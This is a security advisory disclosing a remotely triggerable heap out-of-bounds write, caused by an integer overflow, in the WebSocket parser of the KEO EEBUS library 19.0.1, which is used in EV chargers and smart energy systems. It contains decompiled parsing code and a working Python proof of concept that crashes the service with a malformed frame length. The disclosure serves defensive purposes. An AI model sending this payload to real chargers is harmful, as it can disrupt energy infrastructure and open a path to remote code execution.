Resources

PRODUCT DESCRIPTION

The KEO EEBUS library is a robust communication framework designed to facilitate interoperability and seamless data exchange within smart energy management systems. Developed by KEO Connectivity, the library aligns with the EEBUS initiative standards, which promote device compatibility and energy efficiency in smart home and industrial settings.

Figure 1. Application of KEO EEBUS library
(image source: https://www.keo-connectivity.de)

This library enables secure and efficient communication between a wide array of devices, such as smart meters, electric vehicle chargers, home energy management systems, and other IoT-enabled appliances. Leveraging standardized protocols, it allows devices to interact with and respond to energy demand, optimizing consumption and supporting energy grid stability. The KEO EEBUS library is widely integrated into systems focused on energy efficiency, smart grid technology, and sustainable energy management, serving both domestic and commercial applications.

SUMMARY

The PCAutomotive team identified a vulnerability that allowed attackers to execute code on systems using version 19.0.1 of the KEO library.

Table 1 – Summary of vulnerabilities discovered during the research.

DISCLOSURE TIMELINE

TECHNICAL DETAILS

The PCAutomotive team verified all the findings described in this document on the model(s) KEO Library with version 19.0.1. This library is used for processing low level internals of the EEBUS protocol.

Heap Out-Of-Bound Write in EEBUS

Description

EEBUS request consists of following levels:

1. TLS with self-signed certificates
2. WebSocket communication in binary mode
3. SHIP messages in JSON format

For using binary mode of WebSocket there is WebSocket framing, consists of masking, fragmentation etc. This functionality is implemented in library libkeo_ship.so.19.0.1.

So in function keo_ship::WebSocketParser::parseFrame it tries to parse the following structure:

Figure 2 – Websocket frame structure

In case of second byte of frame ("payload len") is 0x7f, then payload length will be a 64-bit value. It is parsed in function  sub_24108 and saved to variable  dPayloadLen .

Listing 1 - code for parsing Websocket frame

if ( (unsigned int)(sData.pEnd - sData.pStart) <= 1 )
    return 1;
  v7 = *(_BYTE *)sData.pStart;
  v8 = *((char *)sData.pStart + 1);
  v9 = *((_BYTE *)sData.pStart + 1) & 0x7F;
  if ( v9 > 0x7D )
  {
    if ( v9 == 0x7E )
    {
      if ( dDataLen <= 4 )
        return 1;
      v10 = 4;
      v9 = (unsigned __int16)__rev16(*((unsigned __int16 *)sData.pStart + 1));
    }
    else
    {
      if ( dDataLen <= 0xA )
        return 1;
      v10 = 10;
      dPayloadLen = sub_24108(i_pInData, 2);
    }
  }

Further this value checked:

Listing 2 - code for parsing Websocket frame (continue)

pEnd = i_pInData->pEnd;
  pStart = (char *)i_pInData->pStart;
  if ( dPayloadLen + dCurOffset <= pEnd - (_BYTE *)i_pInData->pStart )
  {
    switch ( v7 & 0xF )

Because of integer overflow this check can be bypassed. Further this value used in write operation for heap memory:

Listing 3 - code for parsing Websocket frame (continue)

    v20 = &pStart[v18 - v17];
        if ( v20 != v18 )
          i_pInData->pEnd = v20;
        if ( v8 < 0 && dPayloadLen )
        {
          for ( i = 0; i != dPayloadLen; ++i )
            *((_BYTE *)i_pInData->pStart + i) ^= v12[i & 3];
        }
        *a3 = dPayloadLen;

Because of value dPayloadLen is attacker controllable and can be greater than allocation size, as a result Out-Of-Bound Write vulnerability exists.

Exploitation scenario and impact

To reproduce this vulnerability charger should be accessible over network (Ethernet or wireless). The following script can be used to trigger the crash of the service:

Listing 4 - Proof-Of-Concept

import socket
import ssl

def main():
    HOST = "192.168.178.47"
    PORT = 4711
    #HOST = "localhost"
    #PORT = 11111
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    client = ssl.wrap_socket(client, keyfile="key.pem", certfile="cert.pem")
    client.connect((HOST, PORT))
    client.send(b"GET / HTTP/1.1\r\nsec-websocket-protocol: ship\r\nHost: 192.168.178.47:4711\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Version: 13\r\nSec-WebSocket-Key: 7hBeCrki4fXpmkTiNV/lgQ==\r\n\r\n")
    print(client.recv(0x1000))
    client.send(b"\xfa\xff" + b"\xff\xff\xff\xff\xff\xff\xff\xff" + 0x100 * b'A')
    print(client.recv(0x1000))


if __name__ == "__main__":
    main()

The crash can be observed in the debugger:

Figure 3 - Crash in debugger

This vulnerability is triggered remotely. In case of successful exploitation attacker can achieve remote code execution on system.

SUPPLY CHAIN ​​IMPACT

Based on information from open sources, several smart home providers, e-mobility companies, and charging solution vendors were relying on the affected library. This vulnerability might have impacted the supply chain of these companies. The PCAutomotive team advised prioritizing the patch implementation to effectively address and mitigate associated risks.

Recommendations

Considering the criticality of the vulnerability,  immediate action was essential to safeguard the affected supply chain. The following steps were recommended:

• Notification of vendors using the affected library, encouraging prompt application of the patch.
• Review of supply chain dependencies by assessing any additional component or service that may be affected by this vulnerability.
• Monitoring for threat indicators by PSOC: advising the organizations to watch for potential signs of compromise related to the exploitation of the vulnerability.

CREDITS

• Radu Motspan
• David Zani